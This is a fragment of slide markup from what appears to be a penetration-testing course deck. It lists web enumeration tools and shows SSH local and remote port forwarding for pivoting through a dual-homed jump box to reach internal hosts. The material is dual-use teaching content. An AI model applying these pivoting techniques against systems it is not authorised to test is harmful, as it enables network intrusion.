              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5EFB5D2A-E07D-408F-9B48-36D33AF886C9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6078121" y="4490720"/>
            <a:ext cx="3756760" cy="29362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15" name="Straight Connector 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6EFAB583-CB62-4EAF-B165-4286D884AB0F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1501140" y="5184581"/>
            <a:ext cx="76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964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4C3199-A0F0-4462-9201-94CBC57740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B89C448B-808E-493E-AC67-950BFE6E7035}"/>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F23BF2D2-4B64-4C58-A3FF-B11E23809F39}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="414338" y="1295400"/>
            <a:ext cx="11363325" cy="5105400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Highly Variable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Only covering some basic enumeration here</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Always take time to understand the target</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CMS documentation, code review, playing around with the site</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Useful tools:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Browser (duh)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>BurpSuite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (covered in a different session)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Gobuster</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Dirb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Dirbuster</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Nikto</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Curl</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16025015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9CECED-DAEE-4410-92A5-020325A1F5E8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5829300" y="3848311"/>
            <a:ext cx="6267450" cy="1739689"/>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98ADE4E3-EBB3-4F85-A09F-C35EF2AF96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E9A5E24-3759-4D1E-A2CD-5B2E63BF6F6A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Example – Distant Host in Subnet </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{77D1FB03-98D5-409D-8C72-D8B700E50305}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426720" y="1152026"/>
            <a:ext cx="11338560" cy="1066800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Web01 in the 192 subnet has IIS running, jump box dual-homed in 172 and 192</a:t>
            </a:r>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-L </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF000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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="40000"/>
                    <a:lumOff val="60000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>192.168.100.160</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="40000"/>
                    <a:lumOff val="60000"/>
                  </a:schemeClr>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brent@172.16.100.150</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8588914F-2AB8-4D00-BB0F-36E705A5D381}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3232367" y="2017216"/>
            <a:ext cx="6650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Kali port</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5D2D9E5B-5C3F-4D85-ACDD-BE21BCB06BE5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4125156" y="1999782"/>
            <a:ext cx="2301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40000"/>
                    <a:lumOff val="60000"/>
                  </a:srgbClr>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Where to forward traffic to/from</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AA73077A-9433-4AA0-87E9-E06E0540E49C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6679720" y="2029693"/>
            <a:ext cx="6650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40000"/>
                    <a:lumOff val="60000"/>
                  </a:srgbClr>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Vic port</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Rectangle 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A3AC02A-3E72-4906-A511-A82204C405A6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="104775" y="2909091"/>
            <a:ext cx="5543550" cy="321471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4CCD0FF7-FE73-4996-9241-C7FC20774E68}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7809155" y="2029693"/>
            <a:ext cx="27693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Jump box</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="16" name="Picture 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5F060AFB-3B3B-404B-ABA8-E3C8B8626DD6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6870569" y="4058968"/>
            <a:ext cx="4519052" cy="1318374"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17" name="Picture 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{118071F4-FBF9-4138-B002-B4032DFB6D5E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="229628" y="2949371"/>
            <a:ext cx="5293844" cy="808882"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="18" name="Picture 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{22C26BE2-E1F2-4A34-8B0C-1086E57664FF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4"/>
          <a:srcRect b="48856"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="229628" y="3840236"/>
            <a:ext cx="5293844" cy="632316"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="21" name="Picture 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4F4485EA-B4E3-4884-AE3D-49ABDBA91271}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5"/>
          <a:srcRect t="30658" b="17222"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="426720" y="4571053"/>
            <a:ext cx="4884006" cy="1390212"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="20" name="Straight Connector 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1585A3C6-EA9A-40A4-B364-6F3C2C651F15}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371600" y="4971221"/>
            <a:ext cx="76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6590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30FEB-1270-447D-8061-407B32DC91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B9D370-9F7C-4349-884D-58FE7402F4AB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Remote Port Forwarding</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6BA91E8A-3591-4DEB-8759-F6FC19CB7106}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426720" y="1371600"/>
            <a:ext cx="11338560" cy="1088947"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Useful When:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Inbound SSH is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0"/>
              <a:t>blocked</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> on the interesting machine (or we don’t have creds) and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0"/>
              <a:t>outbound</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> SSH is allowed</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="6" name="Group 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BCB372CB-C768-4F36-9A14-8A3CE39ED061}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7397762" y="2563916"/>
            <a:ext cx="1885950" cy="1885950"/>
            <a:chOff x="5314594" y="2581275"/>
            <a:chExt cx="1885950" cy="1885950"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="Rectangle 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{440BCD47-8661-4E58-9577-431526DE9FFF}"/>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8" name="Graphic 7" descr="Monitor with solid fill">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7BA620D4-4D74-4DE2-8E82-07F873465F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9" name="Graphic 8" descr="Monitor with solid fill">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8319C425-951E-461B-A990-9D9B5A5885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8288" y="2563916"/>
            <a:ext cx="1885950" cy="1885950"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BF199D16-1152-453B-BF15-17D128453910}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7093584" y="325924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a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17" name="Graphic 16" descr="Target outline">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0A79DE11-26AF-4951-A213-BBE5DF7049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3537" y="2906634"/>
            <a:ext cx="914400" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="18" name="Straight Connector 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B250BFD-7614-442E-9066-E86BE20BC673}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4990841" y="3443907"/>
            <a:ext cx="2032380" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="accent4"/>
            </a:solidFill>
            <a:prstDash val="dash"/>
            <a:head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E6218907-5432-4848-93C6-97137F8C5869}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1803129" y="4449866"/>
            <a:ext cx="8271347" cy="1885950"/>
            <a:chOff x="1803129" y="4449866"/>
            <a:chExt cx="8271347" cy="1885950"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="40" name="Group 39">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D911ABA9-8D71-44EB-94C5-099ACF4DBDC6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1803129" y="4449866"/>
              <a:ext cx="8271347" cy="1885950"/>
              <a:chOff x="1803129" y="4428942"/>
              <a:chExt cx="8271347" cy="1885950"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="34" name="Group 33">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D4ADDE4C-DD54-4BF2-9686-81058EEA9DE1}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="1803129" y="4428942"/>
                <a:ext cx="8271347" cy="1885950"/>
                <a:chOff x="1606526" y="4354294"/>
                <a:chExt cx="8271347" cy="1885950"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:grpSp>
              <p:nvGrpSpPr>
                <p:cNvPr id="22" name="Group 21">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AB39F08C-728E-46C8-B3E7-913D8FC85C3D}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvGrpSpPr/>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr>
                <a:xfrm>
                  <a:off x="4794238" y="4354294"/>
                  <a:ext cx="1885950" cy="1885950"/>
                  <a:chOff x="5314594" y="2581275"/>
                  <a:chExt cx="1885950" cy="1885950"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="29" name="Rectangle 28">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2B5CF323-430C-4722-B542-3B8D0F60A4F5}"/>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0" name="Graphic 29" descr="Monitor with solid fill">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E142A297-854E-40B6-AA15-70253B4D7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3" name="Graphic 22" descr="Monitor with solid fill">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AEB3BE51-604C-4F8E-A70E-5101F90CB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6526" y="4354294"/>
                  <a:ext cx="1885950" cy="1885950"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
              </p:spPr>
            </p:pic>
            <p:grpSp>
              <p:nvGrpSpPr>
                <p:cNvPr id="31" name="Group 30">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A0ED67D-8AF0-4AA6-BF84-5BFC1B2B8FD2}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvGrpSpPr/>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr>
                <a:xfrm>
                  <a:off x="7991923" y="4354294"/>
                  <a:ext cx="1885950" cy="1885950"/>
                  <a:chOff x="5314594" y="2581275"/>
                  <a:chExt cx="1885950" cy="1885950"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="32" name="Rectangle 31">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0A8BA8B4-41A5-4A32-A6B4-FA6EB0F1487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3" name="Graphic 32" descr="Monitor with solid fill">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AE7826BC-A726-43D1-9CFE-825BBC9CDE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94" y="2581275"/>
                    <a:ext cx="1885950" cy="1885950"/>
                  </a:xfrm>
                  <a:prstGeom prst="rect">
                    <a:avLst/>
                  </a:prstGeom>
                </p:spPr>
              </p:pic>
            </p:grpSp>
          </p:grpSp>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="37" name="Graphic 36" descr="Target outline">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{85678B68-3F53-475F-875E-08644D3C66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4301" y="4792584"/>
                <a:ext cx="914400" cy="914400"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="38" name="Straight Connector 37">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{75DD97EF-D612-4AA7-A8C3-82BC8801E53A}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm flipV="1">
                <a:off x="3689079" y="5249784"/>
                <a:ext cx="1382678" cy="19987"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:ln w="38100">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:prstDash val="dash"/>
                <a:headEnd type="triangle"/>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C3CA0E51-690B-4120-AA76-776066B6E1E8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="6841320" y="5280701"/>
              <a:ext cx="1382678" cy="19987"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="38100">
              <a:solidFill>
                <a:schemeClr val="accent5">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56835B38-E70E-4B80-9C03-4383B542349C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8782687" y="4937080"/>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80</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C14E5A0B-D5EE-4265-8977-D122B30BA5D4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7996994" y="3046850"/>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80</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009652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1BD62-8254-4B5F-A48F-3F6D2F16D3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3F75675-71A8-49E6-9E50-B22BF0EC4C91}"/>
              </a:ext>
            </a:extLst>
